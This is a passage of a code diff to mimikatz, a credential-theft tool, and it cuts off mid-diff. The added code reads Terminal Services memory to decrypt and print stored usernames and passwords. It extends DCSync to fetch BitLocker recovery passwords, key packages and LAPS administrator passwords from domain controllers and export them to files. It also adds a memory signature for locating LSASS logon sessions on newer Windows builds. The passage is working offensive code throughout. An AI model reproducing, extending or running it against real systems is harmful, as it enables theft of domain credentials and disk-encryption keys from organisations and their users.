-						//kprintf(L"-> %08x (%hu %hu %hu)\n", pKiwiData->unk1, pKiwiData->cbDomain, pKiwiData->cbUsername, pKiwiData->cbPassword);
-						if(!(pKiwiData->cbDomain & 1) && (pKiwiData->cbDomain < sizeof(pKiwiData->Domain)))
+						if(!pKiwiData->unk2)
 						{
-							if(!(pKiwiData->cbUsername & 1) && (pKiwiData->cbUsername > sizeof(wchar_t)) && (pKiwiData->cbUsername < sizeof(pKiwiData->UserName)))
+							//kprintf(L"-> %08x (%hu %hu %hu)\n", pKiwiData->unk1, pKiwiData->cbDomain, pKiwiData->cbUsername, pKiwiData->cbPassword);
+							if(!(pKiwiData->cbDomain & 1) && (pKiwiData->cbDomain < sizeof(pKiwiData->Domain)))
 							{
-								if(!(pKiwiData->cbPassword & 1) && (pKiwiData->cbPassword < sizeof(pKiwiData->Password)))
+								if(!(pKiwiData->cbUsername & 1) && (pKiwiData->cbUsername > sizeof(wchar_t)) && (pKiwiData->cbUsername < sizeof(pKiwiData->UserName)))
 								{
-									kprintf(
-										L"\n   Domain      : %.*s\n"
-										L"   UserName    : %.*s\n",
-										pKiwiData->cbDomain / sizeof(wchar_t), pKiwiData->Domain,
-										pKiwiData->cbUsername/ sizeof(wchar_t), pKiwiData->UserName
-										);
-
-									if(pKiwiData->cbPassword && (MIMIKATZ_NT_BUILD_NUMBER >= KULL_M_WIN_MIN_BUILD_10))
+									if(!(pKiwiData->cbPassword & 1) && (pKiwiData->cbPassword < sizeof(pKiwiData->Password)))
 									{
-										decStatus = kull_m_crypto_remote_CryptUnprotectMemory(aProcess.hMemory, pKiwiData->Password, sizeof(pKiwiData->Password), CRYPTPROTECTMEMORY_SAME_PROCESS);
-									}
+										kprintf(
+											L"\n   Domain      : %.*s\n"
+											L"   UserName    : %.*s\n",
+											pKiwiData->cbDomain / sizeof(wchar_t), pKiwiData->Domain,
+											pKiwiData->cbUsername / sizeof(wchar_t), pKiwiData->UserName
+											);

+										if(pKiwiData->cbPassword && (MIMIKATZ_NT_BUILD_NUMBER >= KULL_M_WIN_MIN_BUILD_10))
+										{
+											decStatus = kull_m_crypto_remote_CryptUnprotectMemory(aProcess.hMemory, pKiwiData->Password, sizeof(pKiwiData->Password), CRYPTPROTECTMEMORY_SAME_PROCESS);
+										}
+										else decStatus = TRUE;
+
+										if(decStatus)
+										{
+											kprintf(L"   Password/Pin: %.*s\n", pKiwiData->cbPassword / sizeof(wchar_t), pKiwiData->Password);
+										}
+									}
+								}
+							}
+						}
+					}
+					else if(RtlEqualMemory(MyWebPattern, CurrentPtr, sizeof(MyWebPattern)))
+					{
+						pWebKiwiData = (PWTS_WEB_KIWI) CurrentPtr;
+						if(
+							(pWebKiwiData->Username.Buffer && !((ULONG_PTR) pWebKiwiData->Username.Buffer % 2) && ((ULONG_PTR) pWebKiwiData->Username.Buffer < 0x1000))
+							&&
+							(pWebKiwiData->Username.Length && !(pWebKiwiData->Username.Length % sizeof(wchar_t)) && (pWebKiwiData->Username.Length < ((WTS_USERNAME_LENGTH + 1) * sizeof(wchar_t))) && ((pWebKiwiData->Username.Length == pWebKiwiData->Username.MaximumLength) || (pWebKiwiData->Username.Length == (pWebKiwiData->Username.MaximumLength - sizeof(wchar_t)))))
+							)
+						{
+							if(
+								(pWebKiwiData->Password.Buffer && !((ULONG_PTR) pWebKiwiData->Password.Buffer % 2) && ((ULONG_PTR) pWebKiwiData->Password.Buffer < 0x1000))
+								&&
+								(pWebKiwiData->Password.Length && !(pWebKiwiData->Password.Length % sizeof(wchar_t)) && (pWebKiwiData->Password.Length < ((WTS_PASSWORD_LENGTH + 1) * sizeof(wchar_t))) && ((pWebKiwiData->Password.Length == pWebKiwiData->Password.MaximumLength) || (pWebKiwiData->Password.Length == (pWebKiwiData->Password.MaximumLength - sizeof(wchar_t)))))
+								)
+							{
+								// Domain is not mandatory here
+								kprintf(L"\n   * Web Credentials? *\n");
+								ref = (PBYTE) aProcess.address + (CurrentPtr - (PBYTE) aLocalBuffer.address);
+
+								if(
+									(pWebKiwiData->Domain.Buffer && !((ULONG_PTR) pWebKiwiData->Domain.Buffer % 2) && ((ULONG_PTR) pWebKiwiData->Domain.Buffer < 0x1000))
+									&&
+									(pWebKiwiData->Domain.Length && !(pWebKiwiData->Domain.Length % sizeof(wchar_t)) && (pWebKiwiData->Domain.Length < ((WTS_DOMAIN_LENGTH + 1) * sizeof(wchar_t))) && ((pWebKiwiData->Domain.Length == pWebKiwiData->Domain.MaximumLength) || (pWebKiwiData->Domain.Length == (pWebKiwiData->Domain.MaximumLength - sizeof(wchar_t)))))
+									)
+								{
+									pWebKiwiData->Domain.Buffer = (PWSTR) (ref + (ULONG_PTR) pWebKiwiData->Domain.Buffer);
+									if(kull_m_process_getUnicodeString(&pWebKiwiData->Domain, aProcess.hMemory))
+									{
+										kprintf(L"   Domain      : %wZ\n", &pWebKiwiData->Domain);
+										LocalFree(pWebKiwiData->Domain.Buffer);
+									}
+								}
+
+								pWebKiwiData->Username.Buffer = (PWSTR) (ref + (ULONG_PTR) pWebKiwiData->Username.Buffer);
+								if(kull_m_process_getUnicodeString(&pWebKiwiData->Username, aProcess.hMemory))
+								{
+									kprintf(L"   UserName    : %wZ\n", &pWebKiwiData->Username);
+									LocalFree(pWebKiwiData->Username.Buffer);
+								}
+
+								pWebKiwiData->Password.Buffer = (PWSTR) (ref + (ULONG_PTR) pWebKiwiData->Password.Buffer);
+								if(kull_m_process_getUnicodeString(&pWebKiwiData->Password, aProcess.hMemory))
+								{
+									decStatus = kull_m_crypto_remote_CryptUnprotectMemory(aProcess.hMemory, pWebKiwiData->Password.Buffer, pWebKiwiData->Password.Length, CRYPTPROTECTMEMORY_SAME_PROCESS);
 									if(decStatus)
 									{
-										kprintf(L"   Password/Pin: %.*s\n", pKiwiData->cbPassword / sizeof(wchar_t), pKiwiData->Password);
+										dwOffset = (lstrlen(pWebKiwiData->Password.Buffer) + 1) * sizeof(wchar_t);
+										kprintf(L"   Password/Pin: %s\n ", pWebKiwiData->Password.Buffer);
 									}
+									else kuhl_m_sekurlsa_trymarshal(&pWebKiwiData->Password);
+
+									LocalFree(pWebKiwiData->Password.Buffer);
 								}
 							}
 						}
--- a/mimikatz/modules/kuhl_m_ts.h
+++ b/mimikatz/modules/kuhl_m_ts.h
@ -10,6 +10,7 @@
 #include "../../modules/kull_m_process.h"
 #include "../../modules/kull_m_memory.h"
 #include "../../modules/kull_m_crypto_remote.h"
+#include "sekurlsa/kuhl_m_sekurlsa.h"

 const KUHL_M kuhl_m_ts;

@ -228,6 +229,14 @@ typedef struct _WTS_KIWI {
 } WTS_KIWI, *PWTS_KIWI;
 #pragma pack(pop)

+typedef struct _WTS_WEB_KIWI {
+	DWORD dwVersion;
+	UNICODE_STRING Domain;
+	UNICODE_STRING Username;
+	UNICODE_STRING Password;
+	//BYTE Data[ANYSIZE_ARRAY];
+} WTS_WEB_KIWI, *PWTS_WEB_KIWI;
+
 typedef struct _TS_PROPERTY_KIWI {
 	PCWSTR szProperty;
 	DWORD dwType;
--- a/mimikatz/modules/lsadump/kuhl_m_lsadump_dc.c
+++ b/mimikatz/modules/lsadump/kuhl_m_lsadump_dc.c
@ -16,6 +16,7 @@ LPCSTR kuhl_m_lsadump_dcsync_oids[] = {
 	szOID_ANSI_userAccountControl, szOID_ANSI_accountExpires, szOID_ANSI_pwdLastSet,
 	szOID_ANSI_objectSid, szOID_ANSI_sIDHistory,
 	szOID_ANSI_unicodePwd, szOID_ANSI_ntPwdHistory, szOID_ANSI_dBCSPwd, szOID_ANSI_lmPwdHistory, szOID_ANSI_supplementalCredentials,
+	szOID_ANSI_msFVEKeyPackage, szOID_ANSI_msFVERecoveryGuid, szOID_ANSI_msFVEVolumeGuid, szOID_ANSI_msFVERecoveryPassword,
 	szOID_ANSI_trustPartner, szOID_ANSI_trustAuthIncoming, szOID_ANSI_trustAuthOutgoing,
 	szOID_ANSI_currentValue,
 	szOID_isDeleted,
@ -25,6 +26,8 @@ LPCSTR kuhl_m_lsadump_dcsync_oids_export[] = {
 	szOID_ANSI_sAMAccountName, szOID_ANSI_objectSid,
 	szOID_ANSI_userAccountControl,
 	szOID_ANSI_unicodePwd,
+	szOID_ANSI_msFVEKeyPackage, szOID_ANSI_msFVERecoveryGuid, szOID_ANSI_msFVEVolumeGuid, szOID_ANSI_msFVERecoveryPassword,
+	szOID_ANSI_currentValue,
 	szOID_isDeleted,
 };
 NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
@ -35,7 +38,7 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
 	DRS_HANDLE hDrs = NULL;
 	DSNAME dsName = {0};
 	DRS_MSG_GETCHGREQ getChReq = {0};
-	DWORD dwOutVersion = 0, i, AuthnSvc;
+	DWORD dwOutVersion = 0, i, AuthnSvc, suppAtt = 0;
 	DRS_MSG_GETCHGREPLY getChRep;
 	ULONG drsStatus;
 	LPCWSTR szUser = NULL, szGuid = NULL, szDomain = NULL, szDc = NULL, szService;
@ -43,6 +46,9 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
 	DRS_EXTENSIONS_INT DrsExtensionsInt;
 	BOOL someExport = kull_m_string_args_byName(argc, argv, L"export", NULL, NULL), allData = kull_m_string_args_byName(argc, argv, L"all", NULL, NULL), csvOutput = kull_m_string_args_byName(argc, argv, L"csv", NULL, NULL), withDeleted = kull_m_string_args_byName(argc, argv, L"deleted", NULL, NULL), decodeUAC = kull_m_string_args_byName(argc, argv, L"uac", NULL, NULL), bAuthNtlm = kull_m_string_args_byName(argc, argv, L"authntlm", NULL, NULL);
 	SEC_WINNT_AUTH_IDENTITY secIdentity = {NULL, 0, NULL, 0, NULL, 0, SEC_WINNT_AUTH_IDENTITY_UNICODE};
+	PWCHAR dn;
+	PLDAP ld;
+	ATTRTYP SuppATT_IntId[2] = {0, 0}; // [0] msMcsAdmPwd, [1] msMcsAdmPwdExpirationTime

 	if(!kull_m_string_args_byName(argc, argv, L"domain", &szDomain, NULL))
 		if(kull_m_net_getCurrentDomainInfo(&pPolicyDnsDomainInfo))
@ -68,6 +74,27 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
 					kprintf(L"[DC] \'%s\' will be the user account\n", szUser);

 				kull_m_rpc_getArgs(argc, argv, NULL, NULL, NULL, &szService, L"ldap", &AuthnSvc, ((MIMIKATZ_NT_MAJOR_VERSION < 6) ? RPC_C_AUTHN_GSS_KERBEROS : RPC_C_AUTHN_GSS_NEGOTIATE), NULL, &secIdentity, NULL, TRUE);
+
+				if(kull_m_string_args_byName(argc, argv, L"laps", NULL, NULL))
+				{
+					if(kull_m_ldap_getLdapAndRootDN(szDc, L"schemaNamingContext", &ld, &dn, secIdentity.UserLength ? &secIdentity : NULL))
+					{
+						if(
+							kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId(ld, dn, L"(&(objectclass=attributeSchema)(attributeID=" TEXT(szOID_ANSI_msMcsAdmPwd) L"))", SuppATT_IntId + 0)
+							&&
+							kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId(ld, dn, L"(&(objectclass=attributeSchema)(attributeID=" TEXT(szOID_ANSI_msMcsAdmPwdExpirationTime) L"))", SuppATT_IntId + 1)
+							)
+						{
+							if(SuppATT_IntId[0] && SuppATT_IntId[1])
+							{
+								suppAtt = 2;
+							}
+						}
+						LocalFree(dn);
+						ldap_unbind(ld);
+					}
+				}
+
 				if(kull_m_rpc_createBinding(NULL, L"ncacn_ip_tcp", szDc, NULL, szService, TRUE, bAuthNtlm ? RPC_C_AUTHN_WINNT : ((MIMIKATZ_NT_MAJOR_VERSION < 6) ? RPC_C_AUTHN_GSS_KERBEROS : RPC_C_AUTHN_GSS_NEGOTIATE), secIdentity.UserLength ? &secIdentity : NULL, RPC_C_IMP_LEVEL_DEFAULT, &hBinding, kull_m_rpc_drsr_RpcSecurityCallback))
 				{
 					if(kull_m_rpc_drsr_getDomainAndUserInfos(&hBinding, szDc, szDomain, &getChReq.V8.uuidDsaObjDest, szUser, szGuid, &dsName.Guid, &DrsExtensionsInt))
@ -82,10 +109,11 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
 							getChReq.V8.cMaxBytes = 0x00a00000; // 10M
 							getChReq.V8.ulExtendedOp = (allData ? 0 : EXOP_REPL_OBJ);

-							if(getChReq.V8.pPartialAttrSet = (PARTIAL_ATTR_VECTOR_V1_EXT *) MIDL_user_allocate(sizeof(PARTIAL_ATTR_VECTOR_V1_EXT) + sizeof(ATTRTYP) * ((allData ? ARRAYSIZE(kuhl_m_lsadump_dcsync_oids_export) : ARRAYSIZE(kuhl_m_lsadump_dcsync_oids)) - 1)))
+							if(getChReq.V8.pPartialAttrSet = (PARTIAL_ATTR_VECTOR_V1_EXT *) MIDL_user_allocate(sizeof(PARTIAL_ATTR_VECTOR_V1_EXT) + sizeof(ATTRTYP) * (suppAtt + (allData ? ARRAYSIZE(kuhl_m_lsadump_dcsync_oids_export) : ARRAYSIZE(kuhl_m_lsadump_dcsync_oids)) - 1)))
 							{
 								getChReq.V8.pPartialAttrSet->dwVersion = 1;
 								getChReq.V8.pPartialAttrSet->dwReserved1 = 0;
+								
 								if(allData)
 								{
 									getChReq.V8.pPartialAttrSet->cAttrs = ARRAYSIZE(kuhl_m_lsadump_dcsync_oids_export);
@ -98,6 +126,13 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
 									for(i = 0; i < getChReq.V8.pPartialAttrSet->cAttrs; i++)
 										kull_m_rpc_drsr_MakeAttid(&getChReq.V8.PrefixTableDest, kuhl_m_lsadump_dcsync_oids[i], &getChReq.V8.pPartialAttrSet->rgPartialAttr[i], TRUE);
 								}
+
+								if(suppAtt)
+								{
+									getChReq.V8.pPartialAttrSet->rgPartialAttr[getChReq.V8.pPartialAttrSet->cAttrs++] = SuppATT_IntId[0];
+									getChReq.V8.pPartialAttrSet->rgPartialAttr[getChReq.V8.pPartialAttrSet->cAttrs++] = SuppATT_IntId[1];
+								}
+
 								RpcTryExcept
 								{
 									do
@ -116,7 +151,7 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
 														if(csvOutput)
 															kuhl_m_lsadump_dcsync_descrObject_csv(&getChRep.V6.PrefixTableSrc, &pObject[0].Entinf.AttrBlock, withDeleted, decodeUAC);
 														else
-															kuhl_m_lsadump_dcsync_descrObject(&getChRep.V6.PrefixTableSrc, &pObject[0].Entinf.AttrBlock, szDomain, someExport);
+															kuhl_m_lsadump_dcsync_descrObject(&getChRep.V6.PrefixTableSrc, &pObject[0].Entinf.AttrBlock, szDomain, someExport, SuppATT_IntId, ARRAYSIZE(SuppATT_IntId));
 														pObject = pObject->pNextEntInf;
 													}
 												}
@ -166,6 +201,51 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
 	return STATUS_SUCCESS;
 }

+BOOL kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId(PLDAP ld, PWCHAR dn, PWCHAR req, ATTRTYP *pIntId)
+{
+	BOOL status = FALSE;
+	PWCHAR myAttrs[] = {L"msDS-IntId", NULL};
+	DWORD ret;
+	PLDAPMessage pMessage = NULL, pEntry;
+	PBERVAL *pId;
+	PSTR tmpString;
+
+	ret = ldap_search_s(ld, dn, LDAP_SCOPE_ONELEVEL, req, myAttrs, FALSE, &pMessage);
+	if(ret == LDAP_SUCCESS)
+	{
+		if(ldap_count_entries(ld, pMessage) == 1)
+		{
+			if(pEntry = ldap_first_entry(ld, pMessage))
+			{
+				kprintf(L"[ldap] %s : ", ldap_get_dn(ld, pEntry));
+				pId = ldap_get_values_len(ld, pEntry, myAttrs[0]);
+				if(pId && pId[0])
+				{
+					if(tmpString = (PSTR) LocalAlloc(LPTR, pId[0]->bv_len + 1))
+					{
+						RtlCopyMemory(tmpString, pId[0]->bv_val, pId[0]->bv_len);
+						*pIntId = strtol(tmpString, NULL, 10);
+						kprintf(L"0x%08x\n", *pIntId);
+						status = TRUE;
+
+						LocalFree(tmpString);
+					}
+				}
+				else PRINT_ERROR(L"No values?\n");
+			}
+		}
+		else PRINT_ERROR(L"More than one entry?\n");
+	}
+	else PRINT_ERROR(L"ldap_search_s 0x%x (%u)\n", ret, ret);
+	
+	if(pMessage)
+	{
+		ldap_msgfree(pMessage);
+	}
+	
+	return status;
+}
+
 BOOL kuhl_m_lsadump_dcsync_decrypt(PBYTE encodedData, DWORD encodedDataSize, DWORD rid, LPCWSTR prefix, BOOL isHistory)
 {
 	DWORD i;
@ -233,12 +313,15 @@ void kuhl_m_lsadump_dcsync_descrObject_csv(SCHEMA_PREFIX_TABLE *prefixTable, ATT
 	}
 }

-void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain, BOOL someExport)
+void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain, BOOL someExport, ATTRTYP *pSuppATT_IntId, DWORD cSuppATT_IntId)
 {
 	kull_m_rpc_drsr_findPrintMonoAttr(L"\nObject RDN           : ", prefixTable, attributes, szOID_ANSI_name, TRUE);
+
 	kprintf(L"\n");
 	if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_sAMAccountName, NULL, NULL))
-		kuhl_m_lsadump_dcsync_descrUser(prefixTable, attributes);
+		kuhl_m_lsadump_dcsync_descrUser(prefixTable, attributes, pSuppATT_IntId, cSuppATT_IntId);
+	else if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVERecoveryGuid, NULL, NULL))
+		kuhl_m_lsadump_dcsync_descrBitlocker(prefixTable, attributes, someExport);
 	else if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_trustPartner, NULL, NULL))
 		kuhl_m_lsadump_dcsync_descrTrust(prefixTable, attributes, szSrcDomain);
 	else if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_currentValue, NULL, NULL))
@ -292,7 +375,88 @@ LPCWSTR kuhl_m_lsadump_samAccountType_toString(DWORD accountType)
 	return target;
 }

-void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes)
+void kuhl_m_lsadump_dcsync_descrBitlocker(SCHEMA_PREFIX_TABLE* prefixTable, ATTRBLOCK* attributes, BOOL someExport)
+{
+	UNICODE_STRING uString = {0};
+	DWORD szData = 0;
+	PVOID data = 0;
+	GUID RecoveryGuid;
+	PWCHAR filename;
+
+	kprintf(L"** BITLOCKER RECOVERY INFORMATION **\n\n");
+
+	if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVEVolumeGuid, &data, NULL))
+	{
+		kprintf(L"Volume GUID          : ");
+		kull_m_string_displayGUID((LPCGUID) data);
+		kprintf(L"\n");
+	}
+
+	if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVERecoveryGuid, &RecoveryGuid, NULL))
+	{
+		kprintf(L"Recovery GUID        : ");
+		kull_m_string_displayGUID(&RecoveryGuid);
+		kprintf(L"\n");
+	}
+	else
+	{
+		UuidCreate(&RecoveryGuid);
+		if(someExport)
+		{
+			kprintf(L"Recovery GUID (fake) : ");
+			kull_m_string_displayGUID(&RecoveryGuid);
+			kprintf(L"\n");
+		}
+	}
+
+	if(someExport)
+	{
+		RtlStringFromGUID(&RecoveryGuid, &uString);
+	}
+
+	if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVERecoveryPassword, &data, &szData))
+	{
+		if(szData > 0)
+		{
+			kprintf(L"Recovery Password    : %s\n", data);
+
+			if(someExport)
+			{
+				if(filename = kuhl_m_crypto_generateFileName(L"ntds", L"bitlocker", 0, uString.Buffer ? uString.Buffer : L"(noguid)", L"recoveryPassword"))
+				{
+					kprintf(L"\tExport         : %s - \'%s\'\n", kull_m_file_writeData(filename, (PBYTE)data, szData) ? L"OK" : L"KO", filename);
+					LocalFree(filename);
+				}
+			}
+		}
+	}
+
+	if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVEKeyPackage, &data, &szData))
+	{
+		if(szData > 0)
+		{
+			kprintf(L"Key Package Size     : %u byte(s)\nKey Package          : [", szData);
+			kull_m_string_wprintf_hex(data, szData, 0);
+			kprintf(L"]\n");
+
+			if (someExport)
+			{
+				if(filename = kuhl_m_crypto_generateFileName(L"ntds", L"bitlocker", 0, uString.Buffer ? uString.Buffer : L"(noguid)", L"keyPackage"))
+				{
+					kprintf(L"\tExport         : %s - \'%s\'\n", kull_m_file_writeData(filename, (PBYTE)data, szData) ? L"OK" : L"KO", filename);
+					LocalFree(filename);
+				}
+			}
+		}
+	}
+
+	if (uString.Buffer)
+	{
+		RtlFreeUnicodeString(&uString);
+	}
+}
+
+void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, ATTRTYP *pSuppATT_IntId, DWORD cSuppATT_IntId)
 {
 	DWORD rid = 0, i;
 	PBYTE encodedData;
@ -365,6 +529,21 @@ void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK
 		kprintf(L"\nSupplemental Credentials:\n");
 		kuhl_m_lsadump_dcsync_descrUserProperties((PUSER_PROPERTIES) encodedData);
 	}
+
+	if((cSuppATT_IntId >= 2) && pSuppATT_IntId[0] && pSuppATT_IntId[1])
+	{
+		kprintf(L"LAPS:\n");
+		if(kull_m_rpc_drsr_findMonoAttrNoOID(attributes, pSuppATT_IntId[0], &encodedData, &encodedDataSize))
+		{
+			kprintf(L"  Password   : %.*S\n", encodedDataSize, encodedData);
+		}
+		if(kull_m_rpc_drsr_findMonoAttrNoOID(attributes, pSuppATT_IntId[1], &data, NULL))
+		{
+			kprintf(L"  Last change: ");
+			kull_m_string_displayLocalFileTime((LPFILETIME) data);
+			kprintf(L"\n");
+		}
+	}
 }

 DECLARE_CONST_UNICODE_STRING(PrimaryCleartext, L"Primary:CLEARTEXT");
@ -2096,7 +2275,6 @@ BOOL kuhl_m_lsadump_dcshadow_build_replication(PDCSHADOW_DOMAIN_INFO info)
 				kprintf(L"    uidOriginatingDsa:");
 				kull_m_string_displayGUID(&attr->MetaData.uidOriginatingDsa);
 				kprintf(L"\n");
-				
 			}
 			kprintf(L"\n");
 		}
@ -3046,4 +3224,4 @@ ULONG SRV_IDL_DRSVerifyNames(DRS_HANDLE hDrs, DWORD dwInVersion, DRS_MSG_VERIFYR
 ULONG SRV_IDL_DRSUpdateRefs(DRS_HANDLE hDrs, DWORD dwVersion, DRS_MSG_UPDREFS *pmsgUpdRefs)
 {
 	return STATUS_SUCCESS;
-}
+}
--- a/mimikatz/modules/lsadump/kuhl_m_lsadump_dc.h
+++ b/mimikatz/modules/lsadump/kuhl_m_lsadump_dc.h
@ -12,6 +12,8 @@
 #include "../modules/rpc/kull_m_rpc_drsr.h"
 #include "../kuhl_m.h"
 #include "../kuhl_m_lsadump.h" // to move
+#include "../modules/kull_m_string.h"
+#include "../modules/kull_m_ldap.h"

 NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[]);
 NTSTATUS kuhl_m_lsadump_dcshadow(int argc, wchar_t * argv[]);
@ -39,13 +41,15 @@ typedef struct _USER_PROPERTIES {

 const wchar_t * KUHL_M_LSADUMP_UF_FLAG[32];

+BOOL kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId(PLDAP ld, PWCHAR dn, PWCHAR req, ATTRTYP *pIntId);
 BOOL kuhl_m_lsadump_dcsync_decrypt(PBYTE encodedData, DWORD encodedDataSize, DWORD rid, LPCWSTR prefix, BOOL isHistory);
-void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain, BOOL someExport);
-void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes);
+void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain, BOOL someExport, ATTRTYP *pSuppATT_IntId, DWORD cSuppATT_IntId);
+void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, ATTRTYP *pSuppATT_IntId, DWORD cSuppATT_IntId);
 void kuhl_m_lsadump_dcsync_descrUserProperties(PUSER_PROPERTIES properties);
 void kuhl_m_lsadump_dcsync_descrTrust(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain);
 void kuhl_m_lsadump_dcsync_descrTrustAuthentication(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, PCUNICODE_STRING domain, PCUNICODE_STRING partner, BOOL isIn);
 void kuhl_m_lsadump_dcsync_descrSecret(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, BOOL someExport);
+void kuhl_m_lsadump_dcsync_descrBitlocker(SCHEMA_PREFIX_TABLE* prefixTable, ATTRBLOCK* attributes, BOOL someExport);
 void kuhl_m_lsadump_dcsync_descrObject_csv(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, BOOL withDeleted, BOOL decodeUAC);

 typedef BOOL (*DCSHADOW_SYNTAX_ENCODER) (ATTRVAL* pVal, PWSTR szValue);
--- a/mimikatz/modules/ngc/kuhl_m_ngc.c
+++ b/mimikatz/modules/ngc/kuhl_m_ngc.c
@ -188,7 +188,7 @@ NTSTATUS kuhl_m_ngc_logondata(int argc, wchar_t * argv[])
 				{
 					if(kull_m_process_getVeryBasicModuleInformationsForName(aRemote.hMemory, L"NgcCtnrSvc.dll", &iModule))
 					{
-						aRemote.address = (PBYTE) iModule.DllBase.address + /*0xB4F90;//*/0xbef10; // ContainerManager -- InternalUninitializeService@@YAXXZ proc near
+						aRemote.address = (PBYTE) iModule.DllBase.address + /*0xB4F90;//*0xbef10*/0xA7E60; // ContainerManager -- InternalUninitializeService@@YAXXZ proc near
 						if(kull_m_memory_copy(&aLocalBuffer, &aRemote, sizeof(containerManager)))
 						{
 							aRemote.address = containerManager.unk7;
--- a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
+++ b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
@ -1419,7 +1419,7 @@ VOID kuhl_m_sekurlsa_trymarshal(PCUNICODE_STRING MarshaledCredential)
 						kprintf(L"[UsernameForPacked] ?");
 						break;
 					default:
-						kprintf(L"[?] ?");
+						kprintf(L"[?] ? %u ?", type);
 					}
 					CredFree(Credential);
 				}
--- a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c
+++ b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c
@ -18,6 +18,7 @@ BYTE PTRN_WN63_LogonSessionList[]	= {0x8b, 0xde, 0x48, 0x8d, 0x0c, 0x5b, 0x48, 0
 BYTE PTRN_WN6x_LogonSessionList[]	= {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74};
 BYTE PTRN_WN1703_LogonSessionList[]	= {0x33, 0xff, 0x45, 0x89, 0x37, 0x48, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74};
 BYTE PTRN_WN1803_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74};
+BYTE PTRN_WN11_LogonSessionList[]	= {0x45, 0x89, 0x34, 0x24, 0x4c, 0x8b, 0xff, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74};
 KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
 	{KULL_M_WIN_BUILD_XP,		{sizeof(PTRN_WIN5_LogonSessionList),	PTRN_WIN5_LogonSessionList},	{0, NULL}, {-4,   0}},
 	{KULL_M_WIN_BUILD_2K3,		{sizeof(PTRN_WIN5_LogonSessionList),	PTRN_WIN5_LogonSessionList},	{0, NULL}, {-4, -45}},
@ -29,6 +30,7 @@ KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
 	{KULL_M_WIN_BUILD_10_1703,	{sizeof(PTRN_WN1703_LogonSessionList),	PTRN_WN1703_LogonSessionList},	{0, NULL}, {23,  -4}},
 	{KULL_M_WIN_BUILD_10_1803,	{sizeof(PTRN_WN1803_LogonSessionList),	PTRN_WN1803_LogonSessionList},	{0, NULL}, {23,  -4}},
 	{KULL_M_WIN_BUILD_10_1903,	{sizeof(PTRN_WN6x_LogonSessionList),	PTRN_WN6x_LogonSessionList},	{0, NULL}, {23,  -4}},
+	{KULL_M_WIN_BUILD_2022,		{sizeof(PTRN_WN11_LogonSessionList),	PTRN_WN11_LogonSessionList},	{0, NULL}, {24,  -4}},
 };
 #elif defined(_M_IX86)
 BYTE PTRN_WN51_LogonSessionList[]	= {0xff, 0x50, 0x10, 0x85, 0xc0, 0x0f, 0x84};
--- a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c
+++ b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c
@ -6,7 +6,7 @@
 #include "kuhl_m_sekurlsa_cloudap.h"

 #if defined(_M_X64)
